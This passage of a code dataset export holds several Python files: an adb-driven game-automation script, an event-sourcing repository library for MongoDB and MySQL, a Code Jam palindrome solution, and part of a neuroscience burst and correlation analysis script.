center_loc.append((i[0]+int(w/2),i[1]+int(h/2)))\n return center_loc\n\ndef get_pic(pic_name):\n os.system('adb shell screencap -p /sdcard/'+pic_name+'.png')\n os.system('adb pull /sdcard/'+pic_name+'.png')\n \ndef swipee(x1,y1,x2,y2):\n os.system('adb shell input swipe '+str(x1)+' '+str(y1)+' '+str(x2)+' '+str(y2))\n\ndef point_biase(x,y,biase=5):\n return radd.get_point(x-biase,y-biase,x+biase,y+biase)\n\ndef swipe_biase(x1,y1,x2,y2,biase=5):\n x3,y3 = point_biase(x1,y1)\n x4,y4 = point_biase(x2,y2)\n swipee(x3,y3,x4,y4)\n \ndef tapp(x1,y1):\n os.system('adb shell input tap '+str(x1)+' '+str(y1))\n \ndef sw_or_tap(x1,y1,x2,y2):\n x3,y3=radd.get_point(x1,y1,x2,y2)\n x4,y4=radd.get_point(x1,y1,x2,y2)\n if radd.get_o_l()==1:\n swipee(x3,y3,x4,y4)\n else:\n tapp(x3,y3)\n \ndef random_tap(x1,y1,x2,y2):\n x3,y3=radd.get_point(x1,y1,x2,y2)\n tapp(x3,y3)\n \ndef tap_biase(loc,biase):\n x,y = loc\n random_tap(x-biase,y-biase,x+biase,y+biase)", "repo_name": "fibonacciyys/mypy", "sub_path": "autogamee/yysroyal/screenn.py", "file_name": "screenn.py", 
"file_ext": "py", "file_size_in_byte": 3708, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "win32gui.FindWindow", "line_number": 18, "usage_type": "call"}, {"api_name": "win32gui.GetWindowRect", "line_number": 26, "usage_type": "call"}, {"api_name": "win32gui.GetWindowDC", "line_number": 35, "usage_type": "call"}, {"api_name": "win32ui.CreateDCFromHandle", "line_number": 38, "usage_type": "call"}, {"api_name": "win32ui.CreateBitmap", "line_number": 44, "usage_type": "call"}, {"api_name": "win32con.SRCCOPY", "line_number": 51, "usage_type": "attribute"}, {"api_name": "ctypes.windll.user32.PrintWindow", "line_number": 56, "usage_type": "call"}, {"api_name": "ctypes.windll.user32", "line_number": 56, "usage_type": "attribute"}, {"api_name": "ctypes.windll", "line_number": 56, "usage_type": "name"}, {"api_name": "PIL.Image.frombuffer", "line_number": 64, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 64, "usage_type": "name"}, {"api_name": "win32gui.DeleteObject", "line_number": 70, "usage_type": "call"}, {"api_name": "win32gui.ReleaseDC", "line_number": 73, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 82, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 86, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 87, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 87, "usage_type": "attribute"}, {"api_name": "cv2.matchTemplate", "line_number": 89, "usage_type": "call"}, {"api_name": "cv2.TM_CCOEFF_NORMED", "line_number": 89, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 91, "usage_type": "call"}, {"api_name": "os.system", "line_number": 99, "usage_type": "call"}, {"api_name": "os.system", "line_number": 100, "usage_type": "call"}, {"api_name": "os.system", "line_number": 103, "usage_type": "call"}, {"api_name": "radd.get_point", "line_number": 106, "usage_type": "call"}, {"api_name": "os.system", "line_number": 114, "usage_type": "call"}, {"api_name": "radd.get_point", "line_number": 117, "usage_type": "call"}, {"api_name": "radd.get_point", "line_number": 118, "usage_type": "call"}, {"api_name": "radd.get_o_l", "line_number": 119, "usage_type": "call"}, {"api_name": "radd.get_point", "line_number": 125, "usage_type": "call"}]} +{"seq_id": "3811236566", "text": "import abc\nfrom collections import Iterable\nfrom copy import deepcopy\nfrom .DomainEventListener import DomainEventListener, ApplicationDomainEventPublisher\nfrom .DomainObject import DomainObject\nfrom pymongo import MongoClient\nimport pymysql.cursors\nimport json\n\n\nclass Repository(metaclass=abc.ABCMeta):\n @abc.abstractmethod\n def load(self, object_id):\n raise NotImplementedError()\n\n @abc.abstractmethod\n def exists(self, object_id):\n raise NotImplementedError()\n\n @abc.abstractmethod\n def save(self, obj):\n raise NotImplementedError()\n\n @abc.abstractmethod\n def get_event_stream_for(self, object_id):\n raise NotImplementedError()\n\n @abc.abstractmethod\n def max_version_for_object(self, object_id):\n raise NotImplementedError()\n\n @abc.abstractmethod\n def create_blank_domain_object(self):\n raise NotImplementedError()\n\n\nclass EventPublisherRepository(Repository, metaclass=abc.ABCMeta):\n def __init__(self):\n self.listeners = list()\n self.register_listener(ApplicationDomainEventPublisher().instance)\n\n def save(self, obj):\n to_emit = self.append_to_stream(obj)\n\n assert to_emit is not None\n assert 
isinstance(to_emit, Iterable)\n\n for event in to_emit:\n for listener in self.listeners:\n assert isinstance(listener, DomainEventListener)\n listener.domainEventPublished(event)\n\n def register_listener(self, listener):\n assert listener is not None\n assert isinstance(listener, DomainEventListener)\n\n if listener not in self.listeners:\n self.listeners.append(listener)\n\n @abc.abstractmethod\n def append_to_stream(self, obj):\n raise NotImplementedError()\n\n\nclass MongoEventSourceRepository(EventPublisherRepository, metaclass=abc.ABCMeta):\n def __init__(\n self, host=\"localhost\", port=27017, database=\"fenrys\", collection=\"event_store\"\n ):\n super().__init__()\n self.__client = MongoClient(host, port)\n self.__db = self.__client[database]\n self.__collection = self.__db[collection]\n\n def append_to_stream(self, obj):\n assert obj is not None\n assert isinstance(obj, DomainObject)\n\n max_known_version = self.max_version_for_object(obj.object_id)\n\n events_to_add = list()\n if obj.version_number > max_known_version:\n for event in obj.event_stream:\n if event[\"version\"] > max_known_version:\n events_to_add.append(deepcopy(event))\n\n if len(events_to_add) > 0:\n self.__collection.insert_many(events_to_add)\n\n return deepcopy(events_to_add)\n\n def load(self, object_id):\n obj = self.create_blank_domain_object()\n assert isinstance(obj, DomainObject)\n\n stream = self.get_event_stream_for(object_id)\n obj.rehydrate(stream)\n\n return obj\n\n def exists(self, object_id):\n return len(self.get_event_stream_for(object_id)) > 0\n\n def get_event_stream_for(self, object_id):\n stream = list()\n\n objects = self.__collection.find({\"object_id\": object_id})\n for event in objects:\n event.pop(\"_id\")\n stream.append(event)\n\n return stream\n\n def max_version_for_object(self, object_id):\n max_known_version = 0\n stream = self.get_event_stream_for(object_id)\n\n for event in stream:\n if event[\"version\"] > max_known_version:\n max_known_version = event[\"version\"]\n\n return max_known_version\n\n\nclass MySQLSourceRepository(EventPublisherRepository, metaclass=abc.ABCMeta):\n\n __CREATE_STREAM = \"\"\"create table `{}`(`object_id` varchar(255) not null, `version` int not null, `event_name` varchar(255) not null, `event` longtext not null, `event_timestamp` double not null, primary key(`object_id`, `version`))\"\"\"\n __SELECT_OBJECT_STREAM = \"select * from `{}` where object_id = %s\"\n __INSERT_OBJECT_STREAM = \"insert into `{}`(`object_id`, `version`, `event_name`, `event`, `event_timestamp`) values(%s, %s, %s, %s, %s)\"\n __CHECK_TABLE_EXISTS = \"show tables like %s\"\n __TABLE_EXISTS = False\n\n def __init__(\n self,\n user=\"fenrys\",\n password=\"fenrys\",\n host=\"localhost\",\n database=\"fenrys\",\n table=\"event_store\",\n ):\n super().__init__()\n self.__connection = pymysql.connect(\n host=host,\n user=user,\n password=password,\n db=database,\n charset=\"utf8mb4\",\n cursorclass=pymysql.cursors.DictCursor,\n )\n self.__table = table\n\n self.__create_table()\n\n def __del__(self):\n self.__connection.close()\n\n def __create_table(self):\n if not self.__table_exists():\n try:\n with self.__connection.cursor() as cursor:\n cursor.execute(\n MySQLSourceRepository.__CREATE_STREAM.format(self.__table)\n )\n self.__connection.commit()\n except Exception as e:\n self.__connection.rollback()\n raise e\n\n def __table_exists(self):\n if not MySQLSourceRepository.__TABLE_EXISTS:\n with self.__connection.cursor() as cursor:\n cursor.execute(\n 
MySQLSourceRepository.__CHECK_TABLE_EXISTS, (self.__table)\n )\n result = cursor.fetchone()\n if result:\n MySQLSourceRepository.__TABLE_EXISTS = True\n return True\n else:\n return False\n else:\n return True\n\n def append_to_stream(self, obj):\n assert obj is not None\n assert isinstance(obj, DomainObject)\n\n max_known_version = self.max_version_for_object(obj.object_id)\n\n events_to_add = list()\n if obj.version_number > max_known_version:\n for event in obj.event_stream:\n if event[\"version\"] > max_known_version:\n events_to_add.append(deepcopy(event))\n\n if len(events_to_add) > 0:\n try:\n with self.__connection.cursor() as cursor:\n cursor.executemany(\n MySQLSourceRepository.__INSERT_OBJECT_STREAM.format(\n self.__table\n ),\n map(\n lambda event: (\n event[\"object_id\"],\n int(event[\"version\"]),\n event[\"event_name\"],\n json.dumps(event[\"event\"]),\n \"{:10.15f}\".format(float(event[\"event_timestamp\"])),\n ),\n events_to_add,\n ),\n )\n self.__connection.commit()\n except Exception as e:\n self.__connection.rollback()\n raise e\n\n return deepcopy(events_to_add)\n\n def load(self, object_id):\n obj = self.create_blank_domain_object()\n assert isinstance(obj, DomainObject)\n\n stream = self.get_event_stream_for(object_id)\n obj.rehydrate(stream)\n\n return obj\n\n def exists(self, object_id):\n return len(self.get_event_stream_for(object_id)) > 0\n\n def get_event_stream_for(self, object_id):\n stream = list()\n\n with self.__connection.cursor() as cursor:\n cursor.execute(\n MySQLSourceRepository.__SELECT_OBJECT_STREAM.format(self.__table),\n (object_id),\n )\n results = cursor.fetchall()\n for result in results:\n r = dict()\n r[\"object_id\"] = result[\"object_id\"]\n r[\"version\"] = int(result[\"version\"])\n r[\"event_name\"] = result[\"event_name\"]\n r[\"event\"] = json.loads(result[\"event\"])\n r[\"event_timestamp\"] = float(result[\"event_timestamp\"])\n stream.append(r)\n\n return stream\n\n def max_version_for_object(self, object_id):\n stream = self.get_event_stream_for(object_id)\n\n return max(map(lambda x: x[\"version\"], stream)) if len(stream) > 0 else 0\n\n\nclass InMemoryEventSourceRepository(EventPublisherRepository, metaclass=abc.ABCMeta):\n def __init__(self):\n super().__init__()\n self.__repo = list()\n\n def append_to_stream(self, obj):\n assert obj is not None\n assert isinstance(obj, DomainObject)\n\n max_known_version = self.max_version_for_object(obj.object_id)\n\n events_to_add = list()\n if obj.version_number > max_known_version:\n for event in obj.event_stream:\n if event[\"version\"] > max_known_version:\n events_to_add.append(event)\n self.__repo.append(event)\n\n return deepcopy(events_to_add)\n\n def load(self, object_id):\n obj = self.create_blank_domain_object()\n assert isinstance(obj, DomainObject)\n\n stream = self.get_event_stream_for(object_id)\n obj.rehydrate(stream)\n\n return obj\n\n def exists(self, object_id):\n return len(self.get_event_stream_for(object_id)) > 0\n\n def get_event_stream_for(self, object_id):\n stream = list()\n for event in self.__repo:\n if event[\"object_id\"] == object_id:\n stream.append(event)\n return stream\n\n def max_version_for_object(self, object_id):\n max_known_version = 0\n stream = self.get_event_stream_for(object_id)\n\n for event in stream:\n if event[\"version\"] > max_known_version:\n max_known_version = event[\"version\"]\n\n return max_known_version\n", "repo_name": "FenrysIO/pythonddd", "sub_path": "eventsourcing/EventSourceRepository.py", "file_name": "EventSourceRepository.py", 
"file_ext": "py", "file_size_in_byte": 9866, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "abc.ABCMeta", "line_number": 11, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 12, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 16, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 20, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 24, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 28, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 32, "usage_type": "attribute"}, {"api_name": "abc.ABCMeta", "line_number": 37, "usage_type": "attribute"}, {"api_name": "DomainEventListener.ApplicationDomainEventPublisher", "line_number": 40, "usage_type": "call"}, {"api_name": "collections.Iterable", "line_number": 46, "usage_type": "argument"}, {"api_name": "DomainEventListener.DomainEventListener", "line_number": 50, "usage_type": "argument"}, {"api_name": "DomainEventListener.DomainEventListener", "line_number": 55, "usage_type": "argument"}, {"api_name": "abc.abstractmethod", "line_number": 60, "usage_type": "attribute"}, {"api_name": "abc.ABCMeta", "line_number": 65, "usage_type": "attribute"}, {"api_name": "pymongo.MongoClient", "line_number": 70, "usage_type": "call"}, {"api_name": "DomainObject.DomainObject", "line_number": 76, "usage_type": "argument"}, {"api_name": "copy.deepcopy", "line_number": 84, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 89, "usage_type": "call"}, {"api_name": "DomainObject.DomainObject", "line_number": 93, "usage_type": "argument"}, {"api_name": "abc.ABCMeta", "line_number": 124, "usage_type": "attribute"}, {"api_name": "pymysql.cursors.connect", "line_number": 141, "usage_type": "call"}, {"api_name": "pymysql.cursors", "line_number": 141, "usage_type": "name"}, {"api_name": "pymysql.cursors.cursors", "line_number": 147, "usage_type": "attribute"}, {"api_name": "pymysql.cursors", "line_number": 147, "usage_type": "name"}, {"api_name": "DomainObject.DomainObject", "line_number": 185, "usage_type": "argument"}, {"api_name": "copy.deepcopy", "line_number": 193, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 207, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 218, "usage_type": "call"}, {"api_name": "DomainObject.DomainObject", "line_number": 222, "usage_type": "argument"}, {"api_name": "json.loads", "line_number": 246, "usage_type": "call"}, {"api_name": "abc.ABCMeta", "line_number": 258, "usage_type": "attribute"}, {"api_name": "DomainObject.DomainObject", "line_number": 265, "usage_type": "argument"}, {"api_name": "copy.deepcopy", "line_number": 276, "usage_type": "call"}, {"api_name": "DomainObject.DomainObject", "line_number": 280, "usage_type": "argument"}]} +{"seq_id": "23392744681", "text": "import linecache\nimport math\n\ndef is_palindrome(num):\n if str(num) == str(num)[::-1]:\n return True\n return False\n\ndef is_square(num):\n sqroot = math.sqrt(num)\n if sqroot == int(sqroot):\n return int(sqroot)\n return False\n\ncases = 100\nlines = 100\nfilename = 'small.in'\n\ncase = 1\nline = 1\nwhile case <= cases and line <= lines:\n interval = linecache.getline(filename, line).split()\n start = int(interval[0])\n end = int(interval[1])\n \n fair_and_square = 0\n for num in range(start, end+1):\n if is_palindrome(num):\n #print('{}: Is 
palindrome'.format(num))\n sqroot = is_square(num)\n if sqroot:\n #print('{}: Is square root'.format(num))\n if is_palindrome(sqroot):\n fair_and_square += 1\n #print('{}: Square root is palindrome'.format(num))\n \n print('Case #{}: {}'.format(case, fair_and_square))\n case = case + 1\n line = line + 1\n\n\n\n\n\n", "repo_name": "dr-dos-ok/Code_Jam_Webscraper", "sub_path": "solutions_python/Problem_118/1778.py", "file_name": "1778.py", "file_ext": "py", "file_size_in_byte": 989, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "math.sqrt", "line_number": 10, "usage_type": "call"}, {"api_name": "linecache.getline", "line_number": 22, "usage_type": "call"}]} +{"seq_id": "6101696247", "text": "# ------------------------------------------------------------------------------ #\n# @Author: F. Paul Spitzner\n# @Email: paul.spitzner@ds.mpg.de\n# @Created: 2021-10-25 17:28:21\n# @Last Modified: 2023-05-15 20:12:15\n# ------------------------------------------------------------------------------ #\n# Analysis script that preprocesses experiments and creates dataframes to compare\n# across condtions. Plots and more detailed analysis are in `paper_plots.py`\n# * input files are globbed from the provided input directory using a\n# hardcoded wildcard, depending on the type, e.g. `-t sim`, `-t exp`.\n# * output file names are given automatically, `-o` specifies the output directory.\n# ------------------------------------------------------------------------------ #\n\nimport os\nimport glob\nimport argparse\nimport logging\nimport warnings\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport datetime\n\n# import enlighten\nfrom tqdm.auto import tqdm\nfrom tqdm.contrib.logging import logging_redirect_tqdm\n\nlogging.basicConfig(\n format=\"%(asctime)s | %(levelname)-8s | %(name)-12s | %(message)s\",\n datefmt=\"%y-%m-%d %H:%M\",\n)\nlog = logging.getLogger(__name__)\nlog.setLevel(\"INFO\")\nwarnings.filterwarnings(\"ignore\") # suppress numpy warnings\n\n# our custom modules\nimport bitsandbobs as bnb\nimport ana_helper as ah\nimport plot_helper as ph\n\n# only affects simulations, as in the experiments we have only few neurons\n# per module, thus the 20% of neurons in the module are just one neuron.\nremove_null_sequences = False\n\n# whether to store the analysis of each trial as hdf5 in the usual format\nsave_analysed_h5f = False\n\n# for correlation coefficients, size of time steps in which number of spikes are counted\ntime_bin_size_for_rij = 500 / 1000 # in seconds\n\n# threshold for burst detection [% of max peak height]\n# we found that simulations needed different parameters due to the higher (sampled)\n# number of neurons and time resolution\ndef threshold_factor(etype):\n if etype[0:3] == \"exp\":\n return 10 / 100\n elif etype[0:3] == \"sim\":\n return 2.5 / 100\n else:\n raise ValueError(f\"etype {etype} not recognized\")\n\n\n# for pop. 
rate, width of gaussian placed on every spike, in seconds\ndef bs_large(etype):\n if etype[0:3] == \"exp\":\n return 200 / 1000\n elif etype[0:3] == \"sim\":\n return 20 / 1000\n else:\n raise ValueError(f\"etype {etype} not recognized\")\n\n\ndataframes = None\n\n\ndef main():\n global dataframes\n global h5f\n parser = argparse.ArgumentParser(description=\"Process conditions\")\n parser.add_argument(\n \"-t\",\n dest=\"etype\",\n required=True,\n help=(\n \"'exp', 'exp_chemical', 'exp_bic', 'exp_mod_comp', 'sim',\"\n \" 'sim_partial', 'sim_partial_no_inhib'\"\n ),\n )\n parser.add_argument(\n \"-i\",\n dest=\"input_base\",\n required=True,\n help=\"Root directory for files, `./dat/exp_in/`\",\n )\n parser.add_argument(\n \"-o\",\n dest=\"output_path\",\n required=True,\n help=\"`./dat/exp_out/`\",\n )\n args = parser.parse_args()\n\n output_path = args.output_path\n\n conditions = dict()\n if args.etype == \"exp\":\n for layout in [\"1b\", \"3b\", \"merged\"]:\n conditions[layout] = [\"1_pre\", \"2_stim\", \"3_post\"]\n elif args.etype == \"exp_chemical\":\n conditions[\"KCl_1b\"] = [\"1_KCl_0mM\", \"2_KCl_2mM\"]\n elif args.etype == \"exp_bic\":\n conditions[\"Bicuculline_1b\"] = [\"1_spon_Bic_20uM\", \"2_stim_Bic_20uM\"]\n elif args.etype == \"exp_mod_comp\":\n # comparison between different targeted regions\n conditions[\"partial_s\"] = [\"1_pre\", \"2_stim2\", \"3_post\", \"4_stim1\"] # 2um\n conditions[\"partial_m\"] = [\"1_pre\", \"2_stim2\", \"3_post\", \"4_stim1\"] # 5um\n conditions[\"partial_l\"] = [\"1_pre\", \"2_stim2\", \"3_stim1\"] # 5um wide and higher\n conditions[\"global_s\"] = [\"1_pre\", \"2_stim\", \"3_post\"]\n conditions[\"global_m\"] = [\"1_pre\", \"2_stim\", \"3_post\"]\n conditions[\"global_l\"] = [\"1_pre\", \"2_stim\", \"3_post\"]\n\n elif args.etype == \"sim\":\n # number of axons between modules as layouts\n # first rate gets stimulated \"off\" value assigned, second becomes \"on\"\n # motivation here was to get similar IEI for all k,\n # which occurs at different levels of noise, depending on k.\n conditions[\"k=5\"] = [\"80.0\", \"90.0\"] # Hz\n conditions[\"k=1\"] = [\"75.0\", \"85.0\"]\n conditions[\"k=10\"] = [\"85.0\", \"92.5\"]\n elif args.etype == \"sim_partial\":\n # for the case where we only stimulate 2 modules instead of uniform\n # noise to all, we need a bit more tweaking below\n conditions[\"k=0\"] = [\"0.0\", \"20.0\"]\n conditions[\"k=1\"] = [\"0.0\", \"20.0\"]\n conditions[\"k=3\"] = [\"0.0\", \"20.0\"]\n conditions[\"k=5\"] = [\"0.0\", \"20.0\"]\n conditions[\"k=10\"] = [\"0.0\", \"20.0\"]\n conditions[\"k=-1\"] = [\"0.0\", \"20.0\"]\n elif args.etype == \"sim_partial_no_inhib\":\n # this is the control for blocked inhibition, we only did that for k=5\n conditions[\"k=3\"] = [\"0.0\", \"20.0\"]\n else:\n raise KeyError(\"etype should be one of 'exp', 'exp_chemical', 'exp_bic', 'exp_mod_comp', 'sim', 'sim_partial' or 'sim_partial_no_inhib'\")\n\n # ------------------------------------------------------------------------------ #\n # iterate over all combinations\n # ------------------------------------------------------------------------------ #\n\n log.info(f\"Reading from {args.input_base}\")\n log.info(f\"Writing to {output_path}\")\n\n for layout in tqdm(conditions.keys(), desc=\"Layouts\"):\n\n dataframes = dict()\n for key in [\n \"bursts\",\n \"isis\",\n \"rij\",\n \"rij_paired\",\n \"mod_rij\",\n \"mod_rij_paired\",\n \"trials\",\n ]:\n dataframes[key] = []\n if \"sim\" in args.etype:\n # we collect the correlation coefficients of synaptic resources for sim\n dataframes[\"drij\"] = []\n\n for cdx, condition in 
enumerate(\n tqdm(conditions[layout], leave=False, desc=\"Conditions\")\n ):\n\n # depending on the type of experiment, we have different naming conventions\n # where wildcards '*' should be completed\n if \"exp\" in args.etype:\n input_paths = glob.glob(f\"{args.input_base}/{layout}/*\")\n elif args.etype == \"sim\":\n input_paths = glob.glob(\n f\"{args.input_base}/stim=off_{layout}_kin=30_jA=45.0_jG=50.0_jM=15.0_tD=20.0_rate={condition}_rep=*.hdf5\"\n )\n elif args.etype == \"sim_partial\":\n input_paths = glob.glob(\n f\"{args.input_base}/stim=02_{layout}_kin=30_jA=45.0_jG=50.0_jM=15.0_tD=20.0_rate=80.0_stimrate={condition}_rep=*.hdf5\"\n )\n elif args.etype == \"sim_partial_no_inhib\":\n input_paths = glob.glob(\n f\"{args.input_base}/stim=02_{layout}_kin=30_jA=45.0_jG=0.0_jM=15.0_tD=20.0_rate=80.0_stimrate={condition}_rep=*.hdf5\"\n )\n\n log.debug(f\"found {len(input_paths)} files for {layout} {condition}\")\n\n # trials / realizations\n pbar = tqdm(input_paths, desc=\"Files\", leave=False)\n for path in pbar:\n\n trial = os.path.basename(path)\n if \"sim\" in args.etype:\n trial = trial.split(\"rep=\")[-1].split(\".\")[0]\n\n log.info(\"------------\")\n log.info(f\"{args.etype} {layout} {condition} {trial}\")\n pbar.set_description(f\"{args.etype} {layout} {condition} {trial}\")\n log.info(\"------------\")\n\n # for the dataframes, we need to tidy up some labels\n if \"exp\" in args.etype:\n condition_string = condition[2:]\n stimulation_string = \"On\" if condition[0:2] == \"2_\" else \"Off\"\n elif \"sim\" in args.etype:\n condition_string = f\"{condition} Hz\"\n # here we should be a bit more careful, maybe\n stimulation_string = \"On\" if cdx == 1 else \"Off\"\n\n # the path still contains the trial\n h5f = prepare_file(args.etype, condition, path)\n\n # ------------------------------------------------------------------------------ #\n # overview plot\n # ------------------------------------------------------------------------------ #\n\n # plot overview panels for experiments\n if \"exp\" in args.etype:\n os.makedirs(f\"{output_path}/{layout}/{trial}\", exist_ok=True)\n fig = ph.overview_dynamic(h5f)\n fig.savefig(\n f\"{output_path}/{layout}/{trial}/{condition}_overview.pdf\"\n )\n\n # get a nice zoom in on some bursts\n try:\n max_pos = np.nanargmax(h5f[\"ana.rates.system_level\"])\n max_pos *= h5f[\"ana.rates.dt\"]\n beg = max_pos\n except:\n beg = 0\n beg = np.fmax(0, beg - 10)\n fig.get_axes()[-2].set_xlim(beg, beg + 20)\n fig.savefig(f\"{output_path}/{layout}/{trial}/{condition}_zoom.pdf\")\n plt.close(fig)\n\n # ------------------------------------------------------------------------------ #\n # statistics of bursts\n # ------------------------------------------------------------------------------ #\n\n # we have already done a bunch of analysis in `prepare_file`\n fracs = np.array(h5f[\"ana.bursts.system_level.participating_fraction\"])\n blen = np.array(h5f[\"ana.bursts.system_level.end_times\"]) - np.array(\n h5f[\"ana.bursts.system_level.beg_times\"]\n )\n slen = np.array(\n [len(x) for x in h5f[\"ana.bursts.system_level.module_sequences\"]]\n )\n olen = ah.find_onset_durations(h5f, return_res=True)\n\n # we have num_bursts -1 inter-burst intervals, use time to next burst\n # and last burst gets a nan.\n ibis = h5f[\"ana.ibi.system_level.any_module\"]\n ibis.extend([np.nan] * (len(blen) - len(ibis)))\n\n # propagation delay: how long to go from peak to peak of the module-level\n # population rate\n ah.find_burst_core_delays(h5f)\n delays = np.array(\n [np.mean(x) 
for x in h5f[\"ana.bursts.system_level.core_delays_mean\"]]\n )\n\n df = pd.DataFrame(\n {\n \"Duration\": blen,\n \"Sequence length\": slen,\n \"Core delay\": delays,\n \"Fraction\": fracs,\n \"Onset duration\": olen,\n \"Inter-burst-interval\": ibis,\n \"Condition\": condition_string,\n \"Trial\": trial,\n \"Stimulation\": stimulation_string,\n \"Type\": args.etype,\n }\n )\n dataframes[\"bursts\"].append(df)\n\n # ------------------------------------------------------------------------------ #\n # Inter spike intervals\n # ------------------------------------------------------------------------------ #\n\n isis = []\n for mdx, m_id in enumerate(h5f[\"ana.mod_ids\"]):\n m_dc = h5f[\"ana.mods\"][mdx]\n isis.extend(h5f[f\"ana.isi.{m_dc}.all\"])\n\n df = pd.DataFrame(\n {\n \"ISI\": isis,\n \"Condition\": condition_string,\n \"Trial\": trial,\n \"Stimulation\": stimulation_string,\n \"Type\": args.etype,\n }\n )\n dataframes[\"isis\"].append(df)\n\n # ------------------------------------------------------------------------------ #\n # neuron level correlation coefficients\n # ------------------------------------------------------------------------------ #\n\n # NxN matrix\n neuron_rij = ah.find_rij(\n h5f, which=\"neurons\", time_bin_size=time_bin_size_for_rij\n )\n np.fill_diagonal(neuron_rij, np.nan)\n neuron_rij_flat = neuron_rij.flatten()\n df = pd.DataFrame(\n {\n \"Correlation Coefficient\": neuron_rij_flat,\n \"Condition\": condition_string,\n \"Trial\": trial,\n \"Stimulation\": stimulation_string,\n \"Type\": args.etype,\n }\n )\n # just the bunch of all rijs\n dataframes[\"rij\"].append(df)\n neuron_rij_mean = np.nanmean(neuron_rij)\n neuron_rij_median = np.nanmedian(neuron_rij)\n\n # we also want to compare the correlation coefficients for different\n # combinations (\"parings\") of neurons from certain modules\n pair_descriptions = dict()\n pair_descriptions[\"across_groups_0_2\"] = \"within_stim\"\n pair_descriptions[\"across_groups_1_3\"] = \"within_nonstim\"\n pair_descriptions[\"across_groups_0_1\"] = \"across\"\n pair_descriptions[\"across_groups_2_3\"] = \"across\"\n pair_descriptions[\"all\"] = \"all\"\n for pairing in pair_descriptions.keys():\n neuron_rij_paired = ah.find_rij_pairs(\n h5f, rij=neuron_rij, pairing=pairing, which=\"neurons\"\n )\n df = pd.DataFrame(\n {\n \"Correlation Coefficient\": neuron_rij_paired,\n \"Condition\": condition_string,\n \"Trial\": trial,\n \"Pairing\": pair_descriptions[pairing],\n \"Pair ID\": np.arange(len(neuron_rij_paired)),\n \"Stimulation\": stimulation_string,\n \"Type\": args.etype,\n }\n )\n dataframes[\"rij_paired\"].append(df)\n\n # ------------------------------------------------------------------------------ #\n # module level correlation coefficients\n # ------------------------------------------------------------------------------ #\n\n # 4x4 matrix\n module_rij = ah.find_rij(h5f, which=\"modules\")\n np.fill_diagonal(module_rij, np.nan)\n module_rij_flat = module_rij.flatten()\n df = pd.DataFrame(\n {\n \"Correlation Coefficient\": module_rij_flat,\n \"Condition\": condition_string,\n \"Trial\": trial,\n \"Stimulation\": stimulation_string,\n \"Type\": args.etype,\n }\n )\n # just the bunch of all rijs\n dataframes[\"mod_rij\"].append(df)\n module_rij_mean = np.nanmean(module_rij)\n module_rij_median = np.nanmedian(module_rij)\n\n # pair descriptions as above\n for pairing in pair_descriptions.keys():\n module_rij_paired = ah.find_rij_pairs(\n h5f,\n rij=module_rij,\n pairing=pairing,\n which=\"modules\",\n )\n df = 
pd.DataFrame(\n {\n \"Correlation Coefficient\": module_rij_paired,\n \"Condition\": condition_string,\n \"Trial\": trial,\n \"Pairing\": pair_descriptions[pairing],\n \"Pair ID\": np.arange(len(module_rij_paired)),\n \"Stimulation\": stimulation_string,\n \"Type\": args.etype,\n }\n )\n dataframes[\"mod_rij_paired\"].append(df)\n\n # ------------------------------------------------------------------------------ #\n # Correlation of the depletion variable, for simulations\n # ------------------------------------------------------------------------------ #\n\n if \"sim\" in args.etype:\n drij = ah.find_rij(h5f, which=\"depletion\")\n np.fill_diagonal(drij, np.nan)\n drij_flat = drij.flatten()\n df = pd.DataFrame(\n {\n \"Depletion rij\": drij_flat,\n \"Condition\": condition_string,\n \"Trial\": trial,\n \"Stimulation\": stimulation_string,\n \"Type\": args.etype,\n }\n )\n # just the bunch of all rijs\n dataframes[\"drij\"].append(df)\n\n # ------------------------------------------------------------------------------ #\n # and some summary statistics on the trial level\n # ------------------------------------------------------------------------------ #\n\n fc = ah._functional_complexity(neuron_rij)\n df = pd.DataFrame(\n {\n \"Num Bursts\": [len(blen)],\n \"Mean Neuron Correlation\": [neuron_rij_mean],\n \"Median Neuron Correlation\": [neuron_rij_median],\n \"Mean Module Correlation\": [module_rij_mean],\n \"Median Module Correlation\": [module_rij_median],\n \"Mean IBI\": [np.nanmean(ibis)],\n \"Median IBI\": [np.nanmedian(ibis)],\n \"Mean Rate\": [np.nanmean(h5f[\"ana.rates.system_level\"])],\n \"Mean Fraction\": [np.nanmean(fracs)],\n \"Median Fraction\": [np.nanmedian(fracs)],\n \"Mean Core delays\": [np.nanmean(delays)],\n \"Median Core delays\": [np.nanmedian(delays)],\n \"Functional Complexity\": [fc],\n \"Condition\": condition_string,\n \"Trial\": trial,\n \"Stimulation\": stimulation_string,\n \"Type\": args.etype,\n }\n )\n if \"sim\" in args.etype:\n df[\"Mean Depletion rij\"] = np.nanmean(drij)\n df[\"Median Depletion rij\"] = np.nanmedian(drij)\n dataframes[\"trials\"].append(df)\n\n # ------------------------------------------------------------------------------ #\n # Finalize, and save a copy of the analyzed file for this trial\n # ------------------------------------------------------------------------------ #\n\n if \"exp\" in args.etype and save_analysed_h5f:\n bnb.hi5.recursive_write(\n filename=(\n f\"{output_path}/{layout}/{trial}/{condition}_analyzed.hdf5\"\n ),\n h5_data=h5f,\n )\n\n bnb.hi5.close_hot()\n del h5f\n\n # for every layout, join list of dataframes and save\n for key in dataframes.keys():\n dataframes[key] = pd.concat(dataframes[key], 